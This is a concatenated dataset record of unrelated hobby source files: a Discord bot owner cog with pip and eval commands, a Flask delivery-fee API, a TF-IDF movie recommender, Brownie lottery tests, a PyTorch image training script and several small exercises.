shitpost index\")\n\n with open(\"./storage/shitpost.json\", \"w\") as f:\n json.dump(shitposts, f)\n\n @commands.is_owner()\n @commands.command(name=\"pip\")\n async def pipe(self, ctx, action, pip):\n if action == \"install\":\n await ctx.send(\n 
subprocess.check_call([sys.executable, \"-m\", \"pip\", f\"{action}\", \"-y\", f\"{pip}\"])\n )\n else:\n await ctx.send(\"invalid action\")\n return\n await ctx.send(f\"{pip} has been {action}ed\")\n\n @commands.command(name=\"repeat-embed\")\n @commands.is_owner()\n async def repeatembed(self, ctx, title, desc = \"None\", footer = \"None\", *fields):\n embed = discord.Embed(title = title, description = desc, color = 0x00ff00)\n if footer != \"None\":\n embed.set_footer(text = footer)\n if fields != ():\n i = 0\n while i < len(fields):\n embed.add_field(name = fields[i], value = fields[i+1], inline = False)\n i += 2\n await ctx.send(embed=embed)\n\n @commands.command()\n @commands.is_owner()\n async def run(self, ctx, *, code: str):\n \"\"\"\n Run python stuff\n \"\"\"\n fn_name = \"_eval_expr\"\n\n code = code.strip(\"` \") # get rid of whitespace and code blocks\n if code.startswith(\"py\\n\"):\n code = code[3:]\n\n try:\n # add a layer of indentation\n cmd = \"\\n \".join(code.splitlines())\n\n # wrap in async def body\n body = f\"async def {fn_name}():\\n {cmd}\"\n\n parsed = ast.parse(body)\n body = parsed.body[0].body\n\n insert_returns(body)\n\n env = {\n \"bot\": self.bot,\n \"ctx\": ctx,\n \"message\": ctx.message,\n \"server\": ctx.message.guild,\n \"channel\": ctx.message.channel,\n \"author\": ctx.message.author,\n \"commands\": commands,\n \"discord\": discord,\n \"guild\": ctx.message.guild,\n }\n env.update(globals())\n\n exec(compile(parsed, filename=\"\", mode=\"exec\"), env)\n\n result = await eval(f\"{fn_name}()\", env)\n\n out = \">>> \" + code + \"\\n\"\n output = \"```py\\n{}\\n\\n{}```\".format(out, result)\n\n if len(output) > 2000:\n await ctx.send(\"The output is too long?\")\n else:\n await ctx.send(output.format(result))\n except Exception as e:\n await ctx.send(\"```py\\n>>> {}\\n\\n\\n{}```\".format(code, e))\n\n\nasync def setup(bot: commands.Bot) -> None:\n await bot.add_cog(Owner(bot))\n","repo_name":"JustTemmiesRandomProjects/Random-Scripts-I-ve-Made","sub_path":"discord-2.0-testing/cogs/owner.py","file_name":"owner.py","file_ext":"py","file_size_in_byte":9603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41445403851","text":"import logging\nimport sys\nfrom flask import Flask, request, jsonify\nimport datetime\n\napp = Flask(__name__)\n\ndef calculate_delivery_fee(cart_value, delivery_distance, number_of_items, time):\n \n def calculate_small_order_surcharge(cart_value):\n return 10 - cart_value if cart_value < 10 else 0\n\n def calculate_delivery_distance_fee(delivery_distance):\n delivery_distance_in_km = delivery_distance / 1000\n fee = 2 + (delivery_distance_in_km - 1) // 0.5\n return max(1, fee)\n\n def calculate_number_of_items_surcharge(number_of_items):\n surcharge = (number_of_items - 4) * 0.5 if number_of_items >= 5 else 0\n surcharge += 1.2 if number_of_items >= 13 else 0\n return surcharge\n\n def calculate_rush_hour_multiplier(time):\n try:\n time = datetime.datetime.strptime(time, '%Y-%m-%dT%H:%M:%SZ')\n if time.hour >= 15 and time.hour <= 19 and time.weekday() == 4:\n return 1.2\n except:\n pass\n return 1\n\n if cart_value >= 100:\n return 0\n\n fee = calculate_small_order_surcharge(cart_value)\n fee += calculate_delivery_distance_fee(delivery_distance)\n fee += calculate_number_of_items_surcharge(number_of_items)\n fee *= calculate_rush_hour_multiplier(time)\n\n return min(fee, 15)\n\n@app.route('/delivery_fee', methods=['POST'])\ndef delivery_fee():\n request_data = 
request.get_json()\n app.logger.debug(\"Received request data: %s\", request_data)\n cart_value = request_data.get('cart_value')\n delivery_distance = request_data.get('delivery_distance')\n number_of_items = request_data.get('number_of_items')\n time = request_data.get('time')\n\n fee = calculate_delivery_fee(cart_value, delivery_distance, number_of_items, time)\n \n response = {\n \"delivery_fee\": fee\n }\n\n app.logger.info(\"Calculated delivery fee: %s\", fee)\n\n return jsonify(response)\n\nif __name__ == '__main__':\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.DEBUG)\n app.logger.addHandler(handler)\n app.logger.setLevel(logging.DEBUG)\n app.run(debug=True)\n","repo_name":"shreyank06/delivery_fee_api","sub_path":"api_code/delivery_fee_api.py","file_name":"delivery_fee_api.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27245394197","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[6]:\n\n\n#!/usr/bin/env python\n# coding: utf-8\n\n# In[40]:\n\n\nimport numpy as np\nimport pickle\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport seaborn as sn\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n# In[41]:\n\n\ndef top_tfidf_feats(row, features, top_n=25):\n ''' Get top n tfidf values in row and return them with their corresponding feature names.'''\n topn_ids = np.argsort(row)[::-1][:top_n]\n top_feats = [(features[i], row[i]) for i in topn_ids]\n df = pd.DataFrame(top_feats)\n df.columns = ['feature', 'tfidf']\n return df\n\n\n# In[42]:\n\n\ndef top_mean_feats(Xtr, features, grp_ids=None, min_tfidf=0.1, top_n=25):\n ''' Return the top n features that on average are most important amongst documents in rows\n indentified by indices in grp_ids. '''\n# if grp_ids:\n# D = Xtr[grp_ids].toarray()\n# else:\n D = Xtr.toarray()\n\n D[D < min_tfidf] = 0\n tfidf_means = np.mean(D, axis=0)\n return top_tfidf_feats(tfidf_means, features, top_n)\n\n\n# In[43]:\n\n\ndef top_feats_by_class(Xtr, y, features, min_tfidf=0.1, top_n=25):\n ''' Return a list of dfs, where each df holds top_n features and their mean tfidf value\n calculated across documents with the same class label. '''\n dfs = []\n labels = np.unique(y)\n for label in labels:\n ids = np.where(y==label)\n feats_df = top_mean_feats(Xtr, features, ids, min_tfidf=min_tfidf, top_n=top_n)\n feats_df.label = label\n dfs.append(feats_df)\n return dfs\n\n\n# In[44]:\n\n\ndef plot_tfidf_classfeats_h(dfs):\n ''' Plot the data frames returned by the function plot_tfidf_classfeats(). 
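    One horizontal bar subplot is drawn per class label, with the features on the y-axis and their mean tf-idf scores on the shared x-axis.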
'''\n fig = plt.figure(figsize=(12, 9), facecolor=\"w\")\n x = np.arange(len(dfs[0]))\n for i, df in enumerate(dfs):\n ax = fig.add_subplot(1, len(dfs), i+1)\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n ax.set_frame_on(False)\n ax.get_xaxis().tick_bottom()\n ax.get_yaxis().tick_left()\n ax.set_xlabel(\"Mean Tf-Idf Score\", labelpad=16, fontsize=14)\n ax.set_title(\"label = \" + str(df.label), fontsize=16)\n ax.ticklabel_format(axis='x', style='sci', scilimits=(-2,2))\n ax.barh(x, df.tfidf, align='center', color='#3F5D7D')\n ax.set_yticks(x)\n ax.set_ylim([-1, x[-1]+1])\n yticks = ax.set_yticklabels(df.feature)\n plt.subplots_adjust(bottom=0.09, right=0.97, left=0.15, top=0.95, wspace=0.52)\n plt.show()\n\n\n# In[45]:\n\n\nkeywords= pd.read_csv('./keywords.csv')\n# print(len(keywords))\nkeywords.drop_duplicates(keep=False,inplace=True) \nprint(len(keywords))\ncredits= pd.read_csv('./credits.csv')\n# print(len(credits))\ncredits.drop_duplicates(keep=False,inplace=True) \nprint(len(credits))\nmoviestokeep= pd.read_csv('./links_small.csv')\n\n\nmovies= pd.read_csv('./movies_metadata.csv')\nmovies.drop_duplicates(keep=False,inplace=True) \nprint(len(movies))\n\n\n# In[46]:\n\n\nidstokeep= list(moviestokeep.loc[:, 'tmdbId'])\nidstokeep2= list(keywords.loc[:, 'id'])\nidstokeep3= list(credits.loc[:, 'id'])\n\nkeywords2= keywords[keywords['id'].isin(idstokeep)]\n\nidstokeep4= list(keywords2.loc[:, 'id'])\n\ncredits2= credits[credits['id'].isin(idstokeep4)]\nidstokeep5= list(keywords2.loc[:, 'id'].apply(str))\nmovies2=movies[movies['id'].isin(idstokeep5)]\n# movies2['id'] = movies2['id'].apply(str)\nprint(len(keywords2))\nprint(len(credits2))\nprint(len(movies2))\n\n\n# In[47]:\n\n\npal=keywords2['id']\npal=np.array(pal)\n\nsal=credits2['id']\nsal=np.array(sal)\n\ntal=movies2['id']\ntal=np.array(tal)\n\n# print(len(np.intersect1d(pal,tal)))\n\n\n# In[48]:\n\n\nclist=credits2['cast']\nklist=keywords2['keywords']\nmlist=movies2['original_title']\n# print(mlist)\n\n\n# In[49]:\n\n\nclist=np.array(clist)\ncastlist=[]\nfor j in range(0,len(clist)):\n tempstr=clist[j]\n tg=[i for i in range(len(tempstr)) if tempstr.startswith('name\\':', i)]\n th=[i for i in range(len(tempstr)) if tempstr.startswith('order\\':', i)]\n tempsr=\"\"\n for k in range(0,len(tg)):\n temps=tempstr[tg[k]+8:th[k]-4]\n tempss=temps.replace(\" \", \"\")\n tempsr=tempsr+tempss+\" \"\n tempsr=tempsr.strip()\n castlist.append(tempsr)\n\n\n# In[50]:\n\n\nprint(castlist[0])\n\n\n# In[51]:\n\n\nklist=np.array(klist)\nkeylist=[]\nfor j in range(0,len(klist)):\n tempstr=klist[j]\n tg=[i for i in range(len(tempstr)) if tempstr.startswith('name\\':', i)]\n th=[i for i in range(len(tempstr)) if tempstr.startswith('}', i)]\n tempsr=\"\"\n for k in range(0,len(tg)):\n temps=tempstr[tg[k]+8:th[k]-1]\n tempss=temps.replace(\" \", \"\")\n tempsr=tempsr+tempss+\" \"\n tempsr=tempsr.strip()\n keylist.append(tempsr)\n\n\n# In[52]:\n\n\nprint(keylist[0])\n\n\n# In[53]:\n\n\nmlist=np.array(mlist)\nmovlist=[]\nfor j in range(0,len(mlist)):\n tempstr=mlist[j]\n movlist.append(tempstr)\n\n\n# In[54]:\n\n\nprint(movlist[0])\n\n\n# In[55]:\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nvectorizer = TfidfVectorizer()\nX = vectorizer.fit_transform(castlist)\nprint(X.shape)\n\n\n# In[57]:\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nvectorizer = TfidfVectorizer()\nY = vectorizer.fit_transform(keylist)\nprint(Y.shape)\n\n\n# In[60]:\n\n\nCCS=[]\nfor i in range(0,Y.shape[0]):\n 
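# NOTE: despite the 'C' in the name, CCS is built from Y (the keyword tf-idf matrix), so row i\n    # holds movie i's keyword-based cosine similarity to every movie; KCS below is built from X\n    # (the cast tf-idf matrix) and is the cast-based counterpart.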
CCS.append(cosine_similarity(Y[i:i+1],Y)[0])\nCCS=np.array(CCS)\n\n\n# In[61]:\n\n\nKCS=[]\nfor i in range(0,X.shape[0]):\n    KCS.append(cosine_similarity(X[i:i+1],X)[0])\nKCS=np.array(KCS)\nprint(KCS)\n\n\n# In[62]:\n\n\nCS=0.7*KCS+0.3*CCS\nwith open('./CS.pkl', 'wb+') as f:\n    pickle.dump(CS, f)\n\n\n# In[3]:\n\n\nmovino=0\nintresarr=CS[movino]\nmvnameintr=movlist[movino]\nintresarr=np.array(intresarr)\nindxar=np.argsort(intresarr)[-10:]\n# print(indxar)\nk=[]\nx=[]\ny=[]\nfor i in indxar:\n    k.append(movlist[i])\n    x.append(KCS[movino][i])\n    y.append(CCS[movino][i])\n# width of the bars\nbarWidth = 1\n\n# The x position of bars\nr1 = 2.5*np.arange(len(x))\nr2 = [i + barWidth for i in r1]\n# print(r1)\n# print(r2)\n\n# Draw the two horizontal bar series; labels follow the data actually plotted\n# (y comes from CCS, the keyword-based matrix; x comes from KCS, the cast-based one)\nplt.barh(r2, y, color = 'red', edgecolor = 'black', capsize=10, label='Keyword Similarity')\nplt.barh(r1, x, color = 'blue', edgecolor = 'black', capsize=10, label='Cast Similarity')\n\n# general layout\nplt.yticks([r + barWidth for r in r1], k)\nplt.xlabel('Similarity')\nplt.legend()\nplt.title('Top Similar Movies like '+mvnameintr)\n# Show graphic\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"rajat1401/SML-Project","sub_path":"TF-IDF.py","file_name":"TF-IDF.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3711412650","text":"# Expected eth for entry => 0.0284079610470038 eth => 28407961047003800 wei (approx.)=> 28000000000000000\n\nfrom brownie import Lottery, accounts, config, network, exceptions\nfrom scripts.deploy_lottery import deploy_lottery\nfrom scripts.support_functions import (\n    LOCAL_BLOCKCHAIN_ENVIRONMENTS,\n    get_account,\n    fund_with_link,\n    get_contract,\n)\nfrom web3 import Web3\nimport pytest\n\n\ndef test_getEntranceFee():\n    if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n        pytest.skip()\n    lottery = deploy_lottery()\n    entrance_fee = lottery.getEntranceFee()\n    expected_entrance_fee = Web3.toWei(0.025, \"ether\")\n    assert expected_entrance_fee == entrance_fee\n\n\ndef test_cant_enter_unless_started():\n    if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n        pytest.skip()\n    lottery = deploy_lottery()\n    with pytest.raises(exceptions.VirtualMachineError):\n        lottery.enter({\"from\": get_account(), \"value\": lottery.getEntranceFee()})\n\n\ndef test_can_start_and_enter_lottery():\n    if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n        pytest.skip()\n    lottery = deploy_lottery()\n    account = get_account()\n    lottery.startLottery({\"from\": account})\n    lottery.enter({\"from\": account, \"value\": lottery.getEntranceFee()})\n    assert lottery.players(0) == account\n\n\ndef test_can_enter_lottery():\n    if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n        pytest.skip()\n    lottery = deploy_lottery()\n    account = get_account()\n    lottery.startLottery({\"from\": account})\n    lottery.enter({\"from\": account, \"value\": lottery.getEntranceFee()})\n    fund_with_link(lottery)\n    lottery.endLottery({\"from\": account})\n    assert lottery.lottery_state() == 2\n\n\ndef test_can_pick_winner_correctly():\n    if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n        pytest.skip()\n    lottery = deploy_lottery()\n    account = 
get_account()\n lottery.startLottery({\"from\": account})\n lottery.enter({\"from\": account, \"value\": lottery.getEntranceFee()})\n lottery.enter({\"from\": get_account(index=1), \"value\": lottery.getEntranceFee()})\n lottery.enter({\"from\": get_account(index=2), \"value\": lottery.getEntranceFee()})\n fund_with_link(lottery)\n transaction = lottery.endLottery({\"from\": account})\n request_ID = transaction.events[\"RequestedRandomness\"][\"requestID\"]\n get_contract(\"vrf_coordinator\").callBackWithRandomness(\n request_ID, 816, lottery.address, {\"from\": account}\n )\n starting_balance = account.balance()\n lottery_balance = lottery.balance()\n assert lottery.recentWinner() == account\n assert lottery.balance() == 0\n assert account.balance() == starting_balance + lottery_balance\n","repo_name":"Agi7an/SmartContract-Lottery","sub_path":"tests/test_lottery_unit.py","file_name":"test_lottery_unit.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39675564179","text":"def calc_file(filename='fuel.txt'):\r\n with open(filename) as stream:\r\n items = tuple(map(int, stream.readlines()))\r\n return sum(calc(x) for x in items)\r\n\r\n\r\ndef calc(given):\r\n fuel = given // 3 - 2\r\n if fuel < 1: return 0\r\n return fuel + calc(fuel)\r\n\r\n\r\nif __name__ == '__main__':\r\n total = calc_file()\r\n print(f\"result: {total}\")\r\n","repo_name":"Strangemother/python-advent-of-code","sub_path":"1-b-terse.py","file_name":"1-b-terse.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74007927786","text":"\"\"\"\nauthor: buppter\ndatetime: 2019-08-01 15:51\n\n题目描述:\nGiven an array of integers, return indices of the two numbers such that they add up to a specific target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n示例:\nGiven nums = [2, 7, 11, 15], target = 9,\n\nBecause nums[0] + nums[1] = 2 + 7 = 9,\nreturn [0, 1].\n\n解题思路:\n利用 Map\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n d = {}\n for k, i in enumerate(nums):\n if target - i in d:\n return [d[target - i], k]\n else:\n d[i] = k\n","repo_name":"buppter/algorithms","sub_path":"Leetcode/Map&Set/1_TwoSum.py","file_name":"1_TwoSum.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"15742276406","text":"from django.test import TestCase\nfrom books.models import Book\nfrom books.views import ExternalBookView\nfrom rest_framework.test import APIRequestFactory\n\n\nfactory = APIRequestFactory()\n\n# Create your tests here.\nclass BookModelTest(TestCase):\n \"\"\" Test module for Books model \"\"\"\n\n def setUp(self):\n Book.objects.create(\n name=\"Book 1\",\n isbn=\"123-122-2122\",\n authors=[\"User1\", \"User2\"],\n number_of_pages=250,\n publisher=\"ABC Publishers\",\n country=\"India\",\n release_date=\"2018-06-01\"\n )\n\n def test_book_publishers(self):\n book_data = Book.objects.get(name='Book 1')\n self.assertEqual(book_data.publisher, 'ABC Publishers')\n\n\nclass BookExternalAPITest(TestCase):\n \"\"\" Test module for Books External API views \"\"\"\n\n def test_success(self):\n request = factory.get('/api/external-books/?name=A Game of Thrones')\n response = ExternalBookView().get(request)\n 
self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data['data'][0]['name'], \"A Game of Thrones\")\n\n def test_empty(self):\n request = factory.get('/api/external-books/?name=A Game of')\n response = ExternalBookView().get(request)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data['data'], [])","repo_name":"sakthipanneer/Book-API-Assignment","sub_path":"books/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23151402431","text":"from django import forms\nfrom .models import Tender\n\n\nclass TenderForm(forms.ModelForm):\n\n class Meta:\n model = Tender\n fields = ('deadline_app', 'date_publication', 'customer', 'brief_description',\n 'initial_price', 'contract_guarantee', 'place_performance',\n 'category', 'procurement_stage', 'type_purchase',\n )\n","repo_name":"dakhnovskaya/tenders","sub_path":"tenders_api/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33759915148","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020/6/28 9:49\n @Author : QDY\n @FileName: 334. 递增的三元子序列.py\n\n 给定一个未排序的数组,判断这个数组中是否存在长度为 3 的递增子序列。\n\n 数学表达式如下:\n\n 如果存在这样的i, j, k,且满足0 ≤ i < j < k ≤ n-1,\n 使得arr[i] < arr[j] < arr[k] ,返回 true ;否则返回 false 。\n 说明: 要求算法的时间复杂度为 O(n),空间复杂度为 O(1) 。\n\n 示例 1:\n 输入: [1,2,3,4,5]\n 输出: true\n\n 示例 2:\n 输入: [5,4,3,2,1]\n 输出: false\n\n\"\"\"\n\n\nclass Solution:\n def increasingTriplet(self, nums): # 双指针的贪心算法 时间O(N),空间O(1)\n low, mid = float('inf'), float('inf')\n for n in nums: # 从头扫描一次数组\n if n <= low: # low记录遇到的最小值\n low = n\n elif n <= mid: # mid记录比low大的最小值,mid指向的值有可能在low指向的值之前\n mid = n # mid best_val_acc :\n torch.save(model.state_dict(), 'bestefficient0.pt')\n best_val_acc = val_acc\n\n\n\n return model, train_losses, val_losses, train_accs, val_accs\n\n# Train Loss : 0.4077, Train Acc : 0.8465,\ndef main() :\n DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n model = efficientnet_b2(pretrained=True)\n model.classifier[1] = nn.Linear(in_features=1408, out_features=74)\n model.to(DEVICE)\n\n train_transform = transforms.Compose([\n transforms.Resize((300,300)),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]\n ),\n ])\n\n val_transform = transforms.Compose([\n transforms.Resize((300,300)),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]\n ),\n ])\n\n # dataset\n train_dataset = CustomDataset(\"../data/train_images/\", transform=train_transform)\n val_dataset = CustomDataset(\"../data/val_images/\", transform=val_transform)\n\n # dataloader\n train_loader = DataLoader(train_dataset, batch_size=54, num_workers=4,\n pin_memory=True, shuffle=True)\n val_loader = DataLoader(val_dataset, batch_size=54, num_workers=4,\n pin_memory=True, shuffle=False)\n\n epochs = 100\n criterion = CrossEntropyLoss().to(DEVICE)\n optimizer = AdamW(model.parameters(), lr=0.001)\n\n train(model, train_loader, val_loader, epochs, DEVICE, optimizer, criterion)\n\nif __name__ == \"__main__\" :\n main()","repo_name":"1107c/recommend","sub_path":"train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"29342268023","text":"import sys\nimport configparser\nimport collections\n\nimport requests\nimport numpy as np\n\nSOURCE = 'WIKI'\nDAYS = 5\n\nCFG_PATH = 'stocks.cfg'\nCSV_PATH = 'stocks.csv'\n\nAPI_URL = 'https://www.alphavantage.co/query?'\nQUERY = 'function=TIME_SERIES_DAILY&symbol={}&apikey={}'\n\ndef read_csv(path):\n try:\n with open(path, 'r') as csv:\n fileDat = [x.split(',') for x in csv.readlines()]\n except OSError as e:\n print('Failed to read csv.')\n return None\n\n return fileDat\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n if len(args) != 1:\n print('Requires 1 argument.')\n else:\n config = configparser.ConfigParser()\n config.read(CFG_PATH)\n api_key = config['api']['api key']\n csv_stocks = read_csv(CSV_PATH)\n total_dollars = float(args[0])\n ratio_total = sum([int(x[1]) for x in csv_stocks])\n\n invest_names = []\n invest_dollars = []\n invest_shares = []\n\n for stock, ratio in csv_stocks:\n try:\n raw_data = requests.get(API_URL + QUERY.format(stock, api_key))\n stock_data = list(raw_data.json(object_pairs_hook=collections.OrderedDict)['Time Series (Daily)'].values())[:DAYS]\n # print(list(stock_data['Time Series (Daily)'].keys())[:DAYS])\n # bee = list(stock_data['Time Series (Daily)'].values())[:DAYS]\n hi = np.fromiter((float(x['2. high']) for x in stock_data), np.float_)\n lo = np.fromiter((float(x['3. low']) for x in stock_data), np.float_)\n mean_price = (np.mean(hi) + np.mean(lo)) / 2\n dollars = total_dollars * int(ratio) / ratio_total\n print('%s averaged $%0.2f per share over the last %d %s.' % (stock, mean_price, DAYS, 'day' if DAYS == 1 else 'days'))\n invest_names.append(stock)\n invest_dollars.append(dollars)\n invest_shares.append(dollars / mean_price)\n except KeyError as e:\n print('Error Occurred:')\n print(raw_data)\n\n print('\\nDollar Cost Averaging Advice:')\n\n for name in invest_names:\n print(name, end='\\t\\t')\n\n print()\n\n for dollars in invest_dollars:\n print('$%0.2f' % dollars, end='\\t')\n\n print()\n\n for shares in invest_shares:\n print('%0.2f shares' % shares, end='\\t')\n\n print()","repo_name":"Tonexus/stocks","sub_path":"stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3481815834","text":"import os\nimport torch\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\nfrom src.dataset import data_loader\n\n\n# function to count number of parameters\ndef get_n_params(model):\n np = 0\n for p in list(model.parameters()):\n np += p.nelement()\n return np\n\n\ninput_size = 224*224 * 3 # images are 224*224 pixels and has 3 channels because of RGB color\noutput_size = 2 # there are 2 classes---Cats and Dogs\n\n# number of subprocesses to use for data loading\nnum_workers = 0\n\n# how many samples per batch to load\nbatch_size = 64\n\n# define training and test data directories\ndata_dir = './data/'\ntrain_dir = os.path.join(data_dir, 'training_set/')\ntest_dir = os.path.join(data_dir, 'test_set/')\n\n# create transformers\nimage_size = (224, 224)\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\n\ntrain_transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)])\n\ntest_transforms = transforms.Compose([\n transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)])\n\n# read data set using the custom class\ntrain_dataset = data_loader(train_dir, 
transform=train_transform)\ntest_dataset = data_loader(test_dir, transform=test_transforms)\n\n# load data using utils\ntrain_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size,\n num_workers=num_workers, shuffle=True)\ntest_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size,\n num_workers=num_workers)\n\naccuracy_list = []\n","repo_name":"Hatran1412/Cat-Dog-classification","sub_path":"src/loadingdata.py","file_name":"loadingdata.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"753273612","text":"import sys\nimport random\n\nclass student: #宣告串列结构\n def __init__(self):\n self.num=0\n self.score=0\n self.next=None\n \ndef create_link(data,num): #建立串列副程式\n for i in range(num):\n newnode=student()\n if not newnode:\n print('Error!! 内存配置失败!!')\n sys.exit(0) \n if i==0: #建立串列首\n newnode.num=data[i][0]\n newnode.score=data[i][1]\n newnode.next=None\n head=newnode\n ptr=head\n else: #建立串列其他节点\n newnode.num=data[i][0]\n newnode.score=data[i][1]\n newnode.next=None\n ptr.next=newnode\n ptr=newnode\n newnode.next=head\n return ptr #回传串列\n\ndef print_link(head): #打印串列副程式\n i=0\n ptr=head.next\n while True:\n print('[%2d-%3d] => ' %(ptr.num,ptr.score),end='\\t')\n i=i+1\n if i>=3 : #每行打印三个元素\n print()\n i=0\n ptr=ptr.next\n if ptr==head.next:\n break\n\ndef concat(ptr1,ptr2): #连结串列副程式\n head=ptr1.next #在ptr1及ptr2中,各找任意一个节点\n ptr1.next=ptr2.next #把两个节点的next对调即可\n ptr2.next=head\n return ptr2\n\ndata1=[[None] * 2 for row in range(6)]\ndata2=[[None] * 2 for row in range(6)]\n\nfor i in range(1,7):\n data1[i-1][0]=i*2-1\n data1[i-1][1]=random.randint(41,100)\n data2[i-1][0]=i*2\n data2[i-1][1]=random.randint(41,100)\n\t\nptr1=create_link(data1,6) #建立串列1\nptr2=create_link(data2,6) #建立串列2\ni=0\nprint('\\n原 始 串 列 资 料:')\nprint('座号 成绩 \\t座号 成绩 \\t座号 成绩')\nprint('==========================================')\nprint(' 串列 1 :')\nprint_link(ptr1)\nprint(' 串列 2 :')\nprint_link(ptr2)\nprint('==========================================')\nprint('连结后串列:')\nptr=concat(ptr1,ptr2) #连结串列\nprint_link(ptr)\n","repo_name":"jtlai0921/MP31917_example","sub_path":"MP31917_example/ch03ok/CH03_11.py","file_name":"CH03_11.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6928031261","text":"n = int(input())\nl= []\nfor _ in range(n):\n l.append(list(map(int, input().split())))\n\nk = []\n\nfor index in range(4):\n my = []\n for index2 in range(n):\n if l[index2][index] == 1:\n my.append(index2)\n if len(my) > n/2:\n k.append(my)\n\nprint(k)\n\n# t = int(input())\n# for i in range(t):\n# n = int(input())\n# a = [[] for i in range(n)]\n# for j in range(n):\n# a[j] = list(map(int, input().split()))\n# ans = False\n# for j in range(5):\n# for k in range(5):\n# if k != j:\n# cnt1 = 0\n# cnt2 = 0\n# cntno = 0\n# for z in range(n):\n# if a[z][j] == 1:\n# cnt1 += 1\n# if a[z][k] == 1:\n# cnt2 += 1\n# if a[z][j] == 0 and a[z][k] == 0:\n# cntno += 1\n# if cnt1 >= n // 2 and cnt2 >= n // 2 and cntno == 0:\n# ans = True\n# if ans:\n# print('YES')\n# else:\n# print('NO')","repo_name":"Raffian-moin/Codeforces-solutions","sub_path":"codeforces/group_1598B.py","file_name":"group_1598B.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12926906177","text":"import os\nimport sys\nimport 
subprocess\nimport platform\n\nSCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))\n\nBAT = '.bat' if sys.platform.startswith(('cygwin', 'win')) else ''\nGRADLE_BIN = os.path.normpath(\n os.path.join(\n SCRIPT_PATH, '..', '..', '..', 'third_party', 'gradle', 'bin',\n 'gradle%s' % BAT\n )\n)\n\nANDROID_HOME = os.path.normpath(\n os.path.join(\n SCRIPT_PATH, '..', '..', '..', 'third_party', 'android_tools', 'sdk'\n )\n)\n\nif platform.system() == 'Darwin':\n JAVA_HOME = os.path.normpath(\n os.path.join(\n SCRIPT_PATH, '..', '..', '..', 'third_party', 'java', 'openjdk',\n 'Contents', 'Home'\n )\n )\nelse:\n JAVA_HOME = os.path.normpath(\n os.path.join(\n SCRIPT_PATH, '..', '..', '..', 'third_party', 'java', 'openjdk'\n )\n )\n\n\ndef main():\n if not os.path.isdir(ANDROID_HOME):\n raise Exception('%s (ANDROID_HOME) is not a directory' % ANDROID_HOME)\n\n android_dir = sys.argv[1]\n subprocess.check_output(\n args=[GRADLE_BIN] + sys.argv[2:],\n cwd=android_dir,\n env=dict(os.environ, ANDROID_HOME=ANDROID_HOME, JAVA_HOME=JAVA_HOME),\n )\n return 0\n\n\nif __name__ == '__main__':\n 